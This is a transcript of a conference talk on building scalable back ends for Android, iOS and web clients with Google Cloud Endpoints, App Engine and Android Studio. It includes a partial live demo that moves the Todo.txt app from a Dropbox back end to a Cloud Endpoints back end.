in the inheritance hierarchy between Encoder and your implementation
which implements the features Encoder is missing and that are not really
specific to your implementation.
This way you can easily adapt your implementation to a future version of
Encoder which has the missing features.
Do not use Statement.toString() for other than debugging purposes. If
you are using custom Encoder implementations and want to make sure
that object references are cleared afterwards, create a XMLEncoder
instance and call it's flush() method.
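To illustrate basic XMLEncoder usage in this workaround (a minimal sketch; the class name is arbitrary): encode through an XMLEncoder and close it, which flushes the stream as part of closing.

```java
import java.awt.Point;
import java.beans.XMLEncoder;
import java.io.ByteArrayOutputStream;

public class XmlEncodeDemo {
    // Encode a bean to XML; close() flushes the underlying stream,
    // so pending expressions are written out before the encoder is discarded.
    public static String encode(Object bean) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        XMLEncoder enc = new XMLEncoder(out);
        enc.writeObject(bean);
        enc.close(); // close() implies a flush()
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(encode(new Point(4, 2)));
    }
}
```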
====================================================================== | http://bugs.java.com/bugdatabase/view_bug.do?bug_id=4474171 | CC-MAIN-2014-35 | refinedweb | 1,916 | 52.39 |
Unpacking the Mysteries of Webpack -- A Novice's Journey
Slow incremental builds got you down? Let's figure it out together.
I'd worked on a handful of JavaScript applications with webpack before I inherited one in particular that had painfully sluggish builds. Even the incremental builds were taking up to 20 seconds...every single time I saved a change to a JS file. Being able to detect code changes and push them into my browser is a great feedback loop to have during development, but it kind of defeats the purpose when it takes so long.
What's more, as a compulsive saver and avid collector of Chrome tabs, I basically
lit my computer on fire as it screamed like an F-15 every time webpack ran one of
these builds. I put up with this for awhile because I was scared of webpack.
I shot a handful of awkward glances at
webpack.config.js over the course of
a few weeks. Right before permanent madness set in, I resolved to make things
better. Thus started my journey into webpack.
What are you, webpack?
First off, what exactly is this webpack and what does it do? Let's ask webpack:.
In development, webpack does an initial build and serves the resulting bundles to localhost. Then, as mentioned earlier, it will re-build every time it detects a change to a file that's in one of those bundles. That's our incremental build. webpack tries to be smart and efficient when building assets into bundles. I had suspicions that the webpack configuration on the project was the equivalent of tying a sack of bricks to its ankles.
First off, I had to figure out what exactly I was looking at inside my webpack
config. After a bit of Googling and a short jaunt over to my
package.json,
I discovered the project was using version 1.15.0 and the current version was
2.4.X. Usually newer is better -- and possibly faster as well -- so that's
where I decided to start.
Next stop, webpack documentation! I was delighted to find webpack's documentation included a migration guide for going from v1 to v2. Usually migration guides do one of two things:
- Make me realize how little I actually know about the thing and confuse me further.
Thankfully, upgrading webpack through the migration guide wasn't bad at all. It highlighted all the major configuration options I'd need to update and gave me just enough information to get it done without getting too in the weeds.
10/10, would upgrade again.
At this point, I had webpack 2 installed but I still had an incomplete understanding of what was actually in my config and how it was affecting any given webpack build. Fortunately, I work with a lot of smart, experienced Javascript developers that were able to point out a few critical pieces of configuration that needed attention. Focusing in on those, I started to learn more about what was going on under the hood as well as ways to speed things up without sacrificing build integrity. Before we get there though, let's take a pit stop and discuss terminology.
webpack, you talk funny.
As I was going through this process, I encountered a lot of terminology I hadn't run into before. In webpack land, saying something like "webpack dev server hot reloads my chunks" makes sense. It took some time to figure out what webpack terms like "loaders", "hot module replacement", and "chunks" meant.
Here are some simple explanations:
- Hot Module Replacement is the process by which webpack dev server watches your project directory for code changes and then automatically rebuilds and pushes the updated bundles to the browser.
- Loaders are file processors that run sequentially during a build.
- Chunks are a lower-level concept in webpack where code is organized into groups to optimize hot module replacement
Paul Sherman's post was helpful early on for giving me some perspective on webpack terminlogy outside of webpack's own documentation. I'd suggest checking both of them out.
Now that we all understand each other a little better, let's dig into some of the steps I took during my dive into webpack.
Babel and webpack
Babel is a Javascript compile tool that let's you utilize modern language features (like Javascript classes) when you're writing code while minimizing browser and browser-version support concerns. Coming from Ruby, I love so much about ES6 and ES7. Thanks Babel!
But wait, weren't we talking about webpack? Right. So Babel has a webpack
loader that will plug into the build process. In webpack 2, you use loaders
inside
rules in the top-level
module config setting. Here's a sizzlin'
example:
// webpack.config.js { module: { rules: [ { test: /\.jsx?$/, exclude: /node_modules/, loader: 'babel-loader', options: { cacheDirectory: '.babel-cache' } } ] } }
There are two particularly spicy bits in there that'll speed up your builds.
- Exclude
/node_modules/(directory and everything inside it) -- most libraries don't require you to run Babel over them in order for them to work. No need to burden Babel with extra parsing and compilation!
- Cache Babel's work -- turns out the Babel loader doesn't have to start from scratch every time. Add an arbitrary place for the Babel loader to keep a cache and you'll see build time improvements.
The speed, I can almost taste it. Let's not stop there though, because
Babel has its own config --
.babelrc that needs tending to. In particular,
when using the
es2015 preset for Babel, turning the modules setting to
false
sped up incremental build times:
// .babelrc { "presets": [ "react", ["es2015", { "modules": false }], "stage-2" ] }
Turns out that webpack is capable of handling
import statements itself and it
doesn't need Babel to do any extra work to help it figure out what to do.
Without turning the modules setting off, both webpack and Babel are trying to
handle modules.
Riding the Rainbow with Webpack Bundle Analyzer
While searching the interwebs for webpack optimization strategies, I stumbled
across
webpack-bundle-analyzer.
It's a plugin for webpack that will -- during build -- spin up a server that
opens a visual, interactive representation of the bundles generated by webpack
for the browser. Feast your eyes on the majestic peacock of the webpack
ecosystem!
So majestic. If you're like me, eventually you'd ask yourself, "But.. what does it mean!?". Got u fam.
Each colored section represents a bundle, visualizing its contents and their relative size. You're able to mouse over any of the files to get specifics on size and path. I didn't really know how to organize bundles and their contents, but I did notice a few things immediately based on the visual output of the analyzer:
- Stuff from
node_modulesin both bundles
- Big
.jsonfiles in the middle of
bundle.js
- A million things from
react-iconbloating
node_modulesinside my main
bundle.js. Ack! I'm sure
react-iconsis a great package, but are we really using hundreds of distinct icons? Not even close.
My next task was straightforward -- in concept -- but it took me awhile to figure out how to address each of those issues. Here's what I ended up with:
Thanks to the bundle analyzer, I learned some helpful things along the way. I'll step through the solutions to each of the problems I listed above.
Vendor Code Appearing in Multiple Bundles
Solution:
CommonsChunkPlugin
Using
CommonsChunkPlugin, I was able to extract all vendor code (files in
node_modules and manifest-related code (webpack boilerplate that helps the
browser handle its bundles) into their own bundles. Here's some of the related
config straight out of my
webpack.config.js:
{ plugins: [ new webpack.optimize.CommonsChunkPlugin({ name: 'vendor', minChunks: function(module) { return module.context && module.context.indexOf('node_modules') !== -1 } }), new webpack.optimize.CommonsChunkPlugin({ name: 'manifest' }) ] }
Big
.json Files in the Main Bundle
Solution: Asynchronous Imports
The app was only using the JSON files in a few React components. Rather than
using
import at the top of my React component files, I moved the
import
statements into the
componentWillMount function (lifecycle callback). When
webpack parses
import statements inside functions, it knows to separate those
files into their own bundles. The browser will download them as needed rather
than up front.
Unused Dependencies
Solution: Single File Imports
With
react-icons in particular, there are multiple ways to import icons.
Originally, the import statements looked like this:
import CloseIcon from 'react-icons/md/close'
react-icons also has a compiled folder (
./lib) where pre-built icon files can
be imported directly. Updating the import statements to use the icons from that
path eliminated the extra bloat:
`js
import CloseIcon from 'react-icons/lib/md/close'
`
That covers the things I learned from the bundle analyzer. To wrap up, I'll cover one other webpack config option that made a big difference.
Pick the Right
devtool
Last, and certainly not least, is the
devtool config setting
in webpack. The
devtool in webpack does the work of generating source maps.
There are a number of options that all approach source map generation differently,
making tradeoffs between build time and quality/accuracy. After trying out a
number of the available source map tools, I landed on this configuration:
// webpack.config.js { devtool: isProd ? 'source-map' : 'cheap-module-inline-source-map', }
webpack documentation recommends a full, separate source map for production, so
we're using
source-map in production as it fits the bill. In development, we
use
cheap-module-inline-source-map. It was the fastest option that still gave
me consistently accurate, useful file and line references on errors and during
source code lookup in the browser.
Journey Still Going (Real Strong)
At this point, I'm still no expert in webpack and its many available loaders/plugins, but I at least know enough to be dangerous -- dangerous enough to slay those incremental build times, am i rite?
| https://www.viget.com/articles/unpacking-the-mysteries-of-webpack-a-novices-journey/ | CC-MAIN-2019-51 | refinedweb | 1,659 | 56.15 |
A Guide to Simplicity: Creating Web Backends for Web and Mobile Clients48:40 with Laurence Moroney
Laurence Moroney, from Google, shows you how to build scalable cloud services for your mobile applications, then steps you through how to automatically create proxy classes for these services that run in browsers, on iOS devices and of course, on Android. He'll cover what's needed to go from start to finish -- building a service and then building the clients for it, using Android Studio & Cloud Endpoints-- both freely available tools.
- 0:01
Okay everybody thanks for coming and, welcome to Future
- 0:04
Insights Live, you guys having a good conference so far?
- 0:07
Yeah, yeah?
- 0:08
Enjoying Vegas?
- 0:10
Looking forward to the party tonight, or you gonna skip off and do Vegas instead?
- 0:13
[LAUGH] I see a lot of nods.
- 0:17
[LAUGH] So my name is Laurence Moroney, I'm from Google, and I
- 0:21
work as a developer advocate in Google. I focus primarily on Cloud
- 0:26
In Google, so technologies such as Google App
- 0:29
Engine, Google Compute Engine, that type of stuff.
- 0:31
I also do a lot of work in building mo, building back ends
- 0:35
for mobile clients using a technology that we have called Google Cloud Endpoints.
- 0:39
And I'm gonna be talking a little bit about that today.
- 0:42
And how, we have designed the tooling, particularly in Android Studio,
- 0:46
to make it very simple for developers to build scalable back ends.
- 0:51
Not just for Android clients, but also for iOS clients, for web
- 0:54
clients, and if you wanna build like Windows mobile or desktop clients
- 0:57
or something like that, you can use the same technology as well,
- 1:00
but to be frank, our focus has been on Android, iOS, and web.
- 1:04
So, just to give a quick rundown of the
- 1:06
things that we'll be talking about today: the overview is
- 1:09
gonna talk a little bit about Android studio and
- 1:12
Cloud endpoints and how Cloud endpoints work within Android studio.
- 1:15
I know everybody hates a product page, so I'm
- 1:17
gonna avoid the product page as much as possible.
- 1:20
But I will talk through some of the features.
- 1:21
Particularly some of the ones that I'm gonna be showing.
- 1:23
I'll then be spending the bulk of my time on taking an existing
- 1:27
Android App, and it's a very popular App in the Android Play Store.
- 1:32
And it just fortunately happens to also be open sourced, and producers
- 1:37
of this App gave us permission to take the open source of this
- 1:39
App and to change its back end from using a Dropbox based back
- 1:43
end to using a Cloud end point and Google Cloud based back end.
- 1:48
We can then talk a bit about future directions, where we are going.
- 1:51
As you may know, Google I/O is next week,
- 1:53
so our big conference is next week, with a lot of announcements.
- 1:56
I can't pre announce anything from that, but
- 1:58
I can talk a little bit about where we're
- 1:59
going with some of this stuff, and then we'll have some time for Q and A at the end.
- 2:03
All right, so first of all, let's take a look at Android Studio and
- 2:06
let's take a look at some of the, the Google Cloud endpoints and the technology.
- 2:09
But first question for anybody, how many people here are mobile developers?
- 2:13
Okay and how many of you are Android mobile developers?
- 2:17
Okay, pretty much the same.
- 2:18
Now do you guys build natively for Android using Java
- 2:21
or do you prefer to use something like a phone gap?
- 2:23
So native folks first.
- 2:26
Okay and then the folks that use some kind of cross platform like a phone gap.
- 2:30
Okay so about 60:30 or 60:40 in favor of the phone gap folks, okay.
- 2:34
So I'm gonna be talking primarily about the native stuff here and
- 2:38
the tool that we have called Android Studio is a free tool.
- 2:41
And, it's an early access preview and it can be downloaded
- 2:44
from the really small URL you can see in the corner there.
- 2:47
It's just developer.android.com.
- 2:49
Now we built this to take the best of IntelliJ, and the reason for
- 2:53
this is there's lots of great features in IntelliJ that we like to use.
- 2:56
Some of the things like the build system, the linting tools
- 3:01
the full IDE, and the ability to have plugins in your
- 3:04
IDE so that, we can turn this into a tool not
- 3:07
just for building client applications but also for building Cloud back ends.
- 3:10
And I'll be demonstrating some of those in a moment.
- 3:13
But the idea is, like, we wanted to, you know, present this to you
- 3:15
guys as a holistic way of building an Android application with a Cloud back end.
- 3:19
And then that Cloud back end can also be extended.
- 3:22
So if you wanna use Xcode or if you wanna
- 3:24
use PhoneGap or something like that to build for other platforms.
- 3:29
So Cloud end points, has anybody
- 3:31
used Cloud endpoints, anybody familiar with them?
- 3:34
Nobody, one okay good.
- 3:35
So the idea behind Cloud endpoints is I just wanna take a step
- 3:40
back for a second and think about how do we build mobile applications.
- 3:45
Now a recent survey that we saw said that 87%
- 3:49
of mobile applications require some kind of web or Cloud
- 3:53
back end and of those 87%, about three quarters of
- 3:57
them primarily use that back end just for CRUD data.
- 4:00
They just use it for storing data.
- 4:02
So, create, retrieve, update and delete of data.
- 4:04
So, about a quarter of them actually have just, business logic on the backend.
- 4:09
So, mobile applications, we see from the trend, it's primarily back ends for these.
- 4:14
It's about storing data, and it's about retrieving data,
- 4:16
and it's about keeping it simple and keeping it light.
- 4:18
Now if you're using a web technology for this and you're managing
- 4:22
your own server farms and you're managing all of this kind of stuff.
- 4:26
You've taken on a lot of, a lot of investment to be able to manage
- 4:30
all of these machines to do a very simple task, which is just CRUD data.
- 4:33
So that's the first thing we think, if you
- 4:36
start working with a Cloud vendor such as ourselves
- 4:38
or Microsoft or Amazon or any of the others
- 4:40
who offer particularly a platform as a service offering,
- 4:43
you can take advantage of the fact that they
- 4:46
manage all of the plumbing for you, they manage
- 4:47
all of the infrastructure for you and you can
- 4:50
just focus on building your code, that's part number one.
- 4:52
Part number two then comes to scale, now.
- 4:55
It's a great problem to have if
- 4:57
your application suddenly goes through the roof.
- 4:59
If you have a Superbowl moment.
- 5:00
And instead of 1,000 people using your application a month, you have 1,000,000.
- 5:04
Or you have 10,000,000.
- 5:05
Or something like that.
- 5:06
How do you manage that type of scale?
- 5:08
Now, the reason why I like App Engine and why I joined Google to work on
- 5:11
App Engine, was I find it's the best
- 5:13
technology for rapid scaling that you can find.
- 5:16
I'm gonna give one example of an application that
- 5:19
I worked on and a project that I worked on.
- 5:21
That there's a there's a very famous boy band
- 5:24
who's anybody here like boy bands, out of interest?
- 5:29
Distinct no show of hands.
- 5:30
There's a very famous boy band called One
- 5:31
Direction, I'm sure guys have heard of them
- 5:33
and anybody who has a daughter has probably
- 5:35
heard of them and back in November they
- 5:38
launched a new record and for this new
- 5:40
record they did this seven hour live stream
- 5:43
and if you know anything about this band,
- 5:44
one of the things that's really cool about them.
- 5:46
Is that they're just a bunch of goofballs.
- 5:48
They like to just do crazy, stupid, silly things.
- 5:50
[SOUND] Okay, I'll just hold it.
- 5:55
So as I was saying, so the band, they like to
- 5:57
do these crazy, silly, stupid things, and so for this seven
- 6:00
hour live stream, they wanted to try to break like some
- 6:02
world records, like stacking toilet rolls as high as you could.
- 6:05
The world record for stacked toilet rolls apparently is 27.
- 6:08
So they tried to beat that and do all this on a YouTube live stream.
- 6:12
Now where does this fit into Cloud?
- 6:13
So, one of the things the, the record company for the band
- 6:16
wanted to do was to have a, a second screen application where fans
- 6:19
of the band can interact with the band using this second screen
- 6:23
application and one of the things they had in this was a quiz.
- 6:26
And then the interesting thing about having a
- 6:27
quiz was that the band every ten minutes on
- 6:30
this live stream would say, okay go to
- 6:32
the second screen application now and answer a question.
- 6:35
And, at peak we had about 750,000 concurrent viewers of this.
- 6:40
So if you can imagine your web
- 6:41
application, you're gonna have zero, zero, zero
- 6:44
traffic on the quiz, until the band says go and answer a question now.
- 6:48
And there was like motivation, there was
- 6:49
incentives to do that whoever had the highest
- 6:51
score in questions could, meet the band via
- 6:53
a Google Hangout and that kind of thing.
- 6:55
So you'd have zero traffic on your website.
- 6:58
You'd have zero traffic on your mobile App,
- 7:00
until the band says go and answer this question.
- 7:02
And you'd go from nothing, to three quarters of a million in like ten seconds.
- 7:06
And so you can just imagine the scaling
- 7:08
problems you would have with doing something like that.
- 7:11
So having a platform as a service back end, we build something, we used
- 7:15
PHP and we used Python, to build this back end, using App Engine.
- 7:19
We used a bunch of technologies, such as memcache, instead
- 7:21
of the datastore, to make this as fast as possible.
- 7:24
So that we could have these huge spikes.
- 7:26
We could handle these huge spikes, so we'd have no dropped traffic.
- 7:29
And then as soon as the people have
- 7:30
answered the question, they're dropping off the App.
- 7:33
They're back onto watching the mobiles.
- 7:34
They're back onto watching the, the video stream.
- 7:37
So, imagine you got no traffic.
- 7:38
Huge spike, no traffic for ten minutes, huge spike.
- 7:42
And you wanna build an App that's responsive for that.
- 7:44
So Cloud end points are the way that the back end of this
- 7:47
was able to do this and then the front end for the, for
- 7:50
the mobile App, for the web based App for the quiz, you know
- 7:52
that people would have on their second screen were able to do that.
- 7:55
So that's why I always advocate when you think about when you
- 7:57
wanna build something, advocate building it as a Cloud based back end, as
- 8:01
opposed to a web based back end, cuz you get the ability
- 8:03
to scale right up and the ability to scale right back down again.
- 8:07
And you're only paying for the traffic that you're using.
- 8:09
You're only paying for those spikes.
- 8:10
So this thing ran for seven hours.
- 8:12
We had peak of three quarters of a million people using it and at peak this thing
- 8:17
actually had, the App itself, had more people using
- 8:20
it than google.co.uk which I thought was really cool.
- 8:23
How much do you think it costs in cloud cost to run something like that?
- 8:27
Can anybody hazard a guess?
- 8:30
Thousands, hundreds of thousands.
- 8:33
I can't actually tell you the figure, but what I will tell
- 8:36
you is that three of us went out for
- 8:37
a few drinks after the thing was delivered successfully.
- 8:39
And we didn't drink a lot but our drinks
- 8:41
bill was actually bigger than the cost of running this
- 8:43
and to me that's, that's the definition of success
- 8:45
if you're a software architect, that you know, you can
- 8:48
manage to keep your costs lower than your drinks
- 8:50
bill, so, to talk about Cloud endpoints and how we
- 8:52
did this, the idea is that we have a, it's a very simple way to build server logic.
- 8:57
So it can be consumed by web clients.
- 9:00
It can be consumed by mobile clients.
- 9:02
And then it uses the auto-scaling that I was talking about, the high
- 9:05
availability that I was talking about and the App Engine actually gives to you.
- 9:10
And if you're using tooling like Android Studio, it then gives you strongly typed,
- 9:14
mobile optimized clients for the, the mobile,
- 9:17
like I mentioned Android iOS and web.
- 9:19
And then if you just wanna use like any
- 9:21
other client or if you just wanna build a website
- 9:22
around it, then it does expose standards-based REST
- 9:25
interfaces and you can have built in authorization from that.
- 9:29
So, to take a look at this is roughly what
- 9:31
an application would look like if you build it this way.
- 9:33
So, you use an App Engine or you use your platform as a service which is on
- 9:37
the right of the diagram here and you build
- 9:39
your mobile App, mobile back end running on that.
- 9:42
Then, you expose that back end using Cloud Endpoints, and then
- 9:45
you have Cloud Endpoint clients for iOS, web, Android, and the like.
- 9:50
Now the idea behind these endpoint clients is
- 9:51
that these are actually automatically generated for you,
- 9:54
based on metadata that you specify in the code in the back end.
- 9:58
I know there's a lot of concepts coming hard and fast, but I'll be
- 10:01
demoing this and I'll be building an
- 10:02
application shortly that shows all of this.
- 10:06
Now the idea is, well, it takes the complexity out of it.
- 10:08
So if you were just thinking about building a back end, and then you want to
- 10:11
expose that back end to an iOS client, yes you could build a rest interface for that.
- 10:15
But then when you sit down in Xcode and you start trying to consume that rest
- 10:18
interface, you've got to build the libraries within
- 10:21
your Xcode with, in Objective C or Swift.
- 10:24
I haven't tried it with Swift yet, I've only tried it
- 10:26
with Objective C, to be able to access your back end.
- 10:28
Ditto with Android if you were.
- 10:30
You'd have to build Java library to be able
- 10:32
to access it, if you're a windows phone developer you'd
- 10:34
have to build C sharp libraries to be able
- 10:36
able to access it or VB.net libraries to be able
- 10:38
to do it, and Ditto if you're a web
- 10:39
developer you'd have to build some sort of JavaScript libraries
- 10:42
to do that, so we said what if we do
- 10:44
this, what if we approach this in a different way?
- 10:46
What if we build our back ends, we build them running on App Engine?
- 10:50
We attribute these back ends with various tags,
- 10:53
and then we create a service that looks
- 10:55
at these tags, and says, this is a method, this is an API, this is a parameter.
- 10:59
That type of thing, and uses those tags to automatically generate, those
- 11:03
endpoints, those endpoint clients that are tailored to your specific App.
- 11:08
And that's what this is all about, that's what Cloud end points are all about.
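The "tags" described above are Java annotations on the back-end class. Here is a minimal sketch of the idea, with stub annotations standing in for the real `com.google.api.server.spi.config` ones so the snippet is self-contained; the API name, method name, and echo behavior are made up for illustration:

```java
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;

// Stub annotations standing in for the real Cloud Endpoints ones
// (com.google.api.server.spi.config.Api / ApiMethod), so this sketch
// compiles on its own without the App Engine SDK.
@Retention(RetentionPolicy.RUNTIME)
@interface Api {
    String name();
    String version();
}

@Retention(RetentionPolicy.RUNTIME)
@interface ApiMethod {
    String name();
}

// A back-end class is plain Java; the annotations are the "tags" the
// endpoints tooling reads to say "this is an API, this is a method"
// and then generate the Android/iOS/web client libraries.
@Api(name = "todoApi", version = "v1")
class TodoEndpoint {
    @ApiMethod(name = "echoTask")
    public String echoTask(String text) {
        // A real endpoint would persist or fetch tasks; this just echoes.
        return "task: " + text;
    }
}
```

From metadata like this, the generator can emit the strongly typed, per-platform client classes demonstrated later in the talk.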
- 11:12
And then of course it takes some of the risk out of it, think about all those
- 11:14
scenarios that I was talking about, where you'd
- 11:16
have to build your own clients and objectivity with
- 11:19
Java or something like that, then you've got
- 11:21
to implement security, so if you're implementing security, think
- 11:24
of the complexity of code you'd have to
- 11:26
write in those to access that secured end point.
- 11:29
Again, the idea is, using all those attributes we
- 11:32
were talking about, we're generating those classes for you.
- 11:35
So, Android Studio Cloud end points, our aim is to make it the easiest way that
- 11:40
mobile developers can connect to a back end
- 11:43
running on the Google Cloud platform, it's all
- 11:45
about building the java specific bindings that I
- 11:47
spoke about for Android developers, objective C for
- 11:50
iOS developers etcetera, but when you use android
- 11:52
studio now there's a lot of other goodies.
- 11:54
Based on IntelliJ, and if any, if anybody's used
- 11:57
IntelliJ, there's lots of great goodies that comes along.
- 11:59
Including things such as as-you-type validations.
- 12:02
Now, at Google, we have a very strict
- 12:06
coding style that everybody has to adhere to.
- 12:09
And there's a tool called a linter.
- 12:11
And what the linter does is if I'm writing code
- 12:13
and I'm checking it into the system, and I do
- 12:15
things in my code that are out of style, that
- 12:17
break style, then the linter will go and let me know.
- 12:20
So for example, if I start an API with a dot.
- 12:23
Like dot get tasks or something like that, that actually breaks the style.
- 12:26
And the linting tool within Google takes a
- 12:29
look at the style, says that I've done that
- 12:31
and I have to fix my code before I can check it in and do continuous integration.
- 12:34
So, a lot of companies do that type of thing.
- 12:36
A lot of folks may want to do that kind of thing.
- 12:38
But, enforcing style by having peer review is difficult
- 12:42
but if the tools can help you enforce style so
- 12:44
that they give you a, a red squiggly underline
- 12:46
in your code if you've broken style, that's really useful.
- 12:48
So within Android Studio, you've got the ability to define
- 12:52
the styles that you want your projects to have, and then
- 12:55
when the coders don't follow those styles, then they get a
- 12:58
warning as they are editing or as they try to compile.
- 13:01
[SOUND] Okay, so let's just get straight to the demo instead of talking
- 13:05
about concepts and, what I'm gonna do is add a Cloud back end to
- 13:08
an Android App, so, any Android users, if you have the Play store you
- 13:12
can go open it and take a look at this App. It's called Todo.txt.
- 13:16
It costs two dollars to download it, it's a very simple
- 13:19
to do application, it was written by a third party so it
- 13:22
wasn't written by us and very, very popular you can see if
- 13:25
you look at the Play store it's got lots of positive reviews.
- 13:29
But what's really nice about it other than the positive reviews,
- 13:32
what's really nice about it, is that it's completely open source.
- 13:35
So we said okay, instead of, like,
- 13:38
Coming up with some rough concept to kind
- 13:40
of show off our thing which isn't realistic.
- 13:42
We said why don't we take a good application like this
- 13:44
that people love, that's very popular, and see if, how difficult
- 13:48
would it be, to turn this from using a Dropbox, Dropbox
- 13:52
based back end, to a Google Cloud end points based back end.
- 13:56
So that's exactly what I'm gonna show.
- 13:58
So, this is the architecture of what it would look like.
- 14:00
So on the left, we have the actual application itself.
- 14:04
So the application itself is an Android application and this is what it
- 14:08
looks like today where it's just using Dropbox right, without the back end stuff.
- 14:12
Simple application, it writes a file to the file
- 14:15
system and then Dropbox being a file based thing.
- 14:18
Allows them to just store that file in Dropbox, and
- 14:20
then when you open the application again retrieve it from Dropbox.
- 14:23
And your to do text, your to do list is within that file.
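For context, a todo.txt file is plain text with one task per line, conventionally with an optional priority like "(A) " at the front. A rough sketch of pulling a task out of one such line (the class and field names here are mine, not from the app's source):

```java
// Minimal sketch of parsing one line of a todo.txt-style file.
// Format assumed: optional "(A) " priority prefix, then the task text.
class TodoLine {
    final String priority; // e.g. "A", or null when absent
    final String text;

    TodoLine(String priority, String text) {
        this.priority = priority;
        this.text = text;
    }

    static TodoLine parse(String line) {
        // A priority prefix is "(X) " where X is an uppercase letter.
        if (line.length() >= 4 && line.charAt(0) == '('
                && Character.isUpperCase(line.charAt(1))
                && line.charAt(2) == ')' && line.charAt(3) == ' ') {
            return new TodoLine(String.valueOf(line.charAt(1)), line.substring(4));
        }
        return new TodoLine(null, line);
    }
}
```

The real app's model is richer (contexts, projects, dates), but this is the essential shape of "the to-do list is within that file."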
- 14:27
So we say, okay, what if you're building something like this for the Cloud?
- 14:30
Well, the idea of the Cloud then, is that first
- 14:32
you're gonna have to build your back end for this.
- 14:34
Now I'm gonna build a simple CRUD based back end to replicate what they
- 14:37
were doing, a Dropbox where I can store a file, and I can read the
- 14:41
file, and I can read my tasks from within that file, and then I wrap
- 14:44
that with a Cloud endpoint that would allow any of my clients to access it.
- 14:48
Of course then I also, I'm gonna use a data store, so then once
- 14:52
I, instead of storing a file in the Cloud, I say okay, let's do
- 14:54
this the way I would if I were building a real Cloud application, and
- 14:57
I'm gonna take all the tasks, and I'm gonna store them in a database.
- 15:00
In this case.
- 15:01
We have a no SQL style database called Cloud
- 15:03
data store, and I'm gonna be using that one.
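What the back end has to do against that database is plain CRUD on tasks. As an illustration of the shape of those operations, here is an in-memory map standing in for Cloud Datastore (the real back end would use the App Engine Datastore API instead, which needs the SDK and isn't shown here):

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.concurrent.atomic.AtomicLong;

// In-memory stand-in for Cloud Datastore: the same create/retrieve/
// update/delete shape the endpoint exposes, minus persistence and scaling.
class TaskStore {
    private final Map<Long, String> tasks = new LinkedHashMap<>();
    private final AtomicLong nextId = new AtomicLong(1);

    long create(String text) {
        long id = nextId.getAndIncrement();
        tasks.put(id, text);
        return id;
    }

    String retrieve(long id) {
        return tasks.get(id);
    }

    void update(long id, String text) {
        tasks.put(id, text);
    }

    void delete(long id) {
        tasks.remove(id);
    }
}
```

Each of these four methods maps onto one endpoint method in the generated back end.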
- 15:05
And then finally, there's the interface between
- 15:08
the end points and the application itself.
- 15:10
So, I've defined my Cloud end points, I'll generate the
- 15:13
client libraries, and then I'll start using those client libraries in
- 15:17
the to do text App instead of you know the, the
- 15:21
file based stuff that was there for Dropbox to begin with.
- 15:24
All right, so let me switch to the demo and let me switch to Android studio.
- 15:31
So I just need to move some stuff around here since my mic.
- 15:34
[INAUDIBLE] okay.
- 15:39
Oops.
- 15:42
So in, this is Android Studio.
- 15:44
And in Android Studio I have opened up, you can, can you guys read the code okay?
- 15:48
I have a nice big font, hopefully it's okay.
- 15:51
So in Android Studio I have opened up the todo.txt application itself so.
- 15:57
Within the todo, todo.txt application, there are
- 16:00
a number of components that it uses.
- 16:02
There's like a, you know, a swipe-to-refresh, and
- 16:05
all those kinds of components.
- 16:07
So each one of these has a build file associated with it.
- 16:10
Anybody familiar with Gradle?
- 16:13
Okay, so you guys know all about Gradle so that's good.
- 16:15
So Gradle is just basically a build system and it allows us to synchronize building.
- 16:19
Each of the sub components along with building of the main component.
- 16:24
Of the main application itself.
- 16:25
So if I then come within here, and I take a look at within
- 16:29
todo.txt here, I can see the build.gradle for the actual app itself.
- 16:35
And here are the dependencies, so the
- 16:37
dependencies are a number of the components, including this
- 16:39
spectacularly named Chuck B Jones swiped to dismiss undo list and so these were a
- 16:44
third party component that the original App
- 16:46
developer had brought in, and the Gradle build
- 16:49
file allows me to just define them within my main project itself.
- 16:54
Now I'm gonna be configuring that later to pull
- 16:56
in the components that I'm going to be generating here.
- 16:59
So, let me just open up something here.
- 17:04
Okay so, next up within Android studio we have
- 17:09
the Cloud tools that allow us to define endpoints.
- 17:12
Sorry I'm.
- 17:13
My stage is a little crowded so so if I come into tools and
- 17:19
through these Google Cloud tools and there's
- 17:21
something that allows me to generate an endpoint.
- 17:24
So if I said, oops, [SOUND] my microphone keeps getting in the way.
- 17:32
So I'm gonna come up here and try this again.
- 17:36
Tools, Google Cloud tools, and I'm gonna add an App Engine back end.
- 17:43
So, I haven't created anything in App Engine yet,
- 17:47
I haven't touched anything in Google Cloud so, what's included
- 17:50
here is a simulator for the Google Cloud App Engine
- 17:53
runtime, and I'm gonna add an endpoint for that.
- 17:55
There are a number of different ways I could do it.
- 17:57
There are Java Endpoints modules.
- 17:58
There are Java servlet modules, that kind of thing.
- 18:01
But I'm gonna do it as a Java endpoints module.
- 18:03
Let me just rearrange something here quickly, so I could see.
- 18:08
All right, and I'm gonna call this, the application's called todo.txt.
- 18:12
So I'm gonna call my back end the to do txt back end.
- 18:15
And then, I'm just gonna put that in the namespace com.google.todotxt.backend.
- 18:20
[SOUND] And then I'm gonna generate that.
- 18:24
So now it's just generating a basic back end for me.
- 18:27
Now, one of the things we're using Gradle is
- 18:29
that I've got lots of Gradle files in this project.
- 18:32
I've got one for each component,
- 18:33
one for the backend,
- 18:34
one for the client app itself.
- 18:36
So.
- 18:37
Sometimes it starts trying to build things before those have been
- 18:40
updated, and that's why I got that red error at the bottom.
- 18:43
But it's okay.
- 18:43
It just takes a little while for them
- 18:46
all to get synched up and then it will work.
- 18:48
And so, but if I look at the code
- 18:49
that I've generated now, I have my todo.txt back end.
- 18:53
And if I go in here and I take a look at my Java code.
- 18:56
Very, very simple Java Code.
- 18:57
It's just a plain old Java object that's been created for me.
- 19:00
That contains a string and a getter and a setter for that string.
- 19:03
And then the interesting thing is the end point itself.
- 19:06
So, if I open this end point.
- 19:08
First of all, there are a number of things I can view.
- 19:09
If you look at the yellow one.
- 19:10
So, the syntax coloring here, I've just defined yellow
- 19:13
to be the attributes for the Cloud
- 19:17
Endpoints.
- 19:18
So, you see I have an @Api attribute, and so that's just defining that this is
- 19:22
an API that I want to build, so, when I build this code, App Engine itself will
- 19:27
have this defined as an API, when I point the tools at it to say generate client
- 19:32
classes to access my API for me, it's
- 19:34
gonna be using this attribute to pull that out.
- 19:37
There's an API namespace, but the important ones
- 19:39
I wanna look at here are the API methods.
- 19:41
So you see the tool has generated a method for
- 19:45
me that I'm calling sayHi, and then it's returning a bean
- 19:48
called MyBean, which is just this one that we showed a
- 19:50
moment ago, which has the data, the getter, and the setter for that.
- 19:54
And then the method itself, I'm gonna call it
- 19:56
